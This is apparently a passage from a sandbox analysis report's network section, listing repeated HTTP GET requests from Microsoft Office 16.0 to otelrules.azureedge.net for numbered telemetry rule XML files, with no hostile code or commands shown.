      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
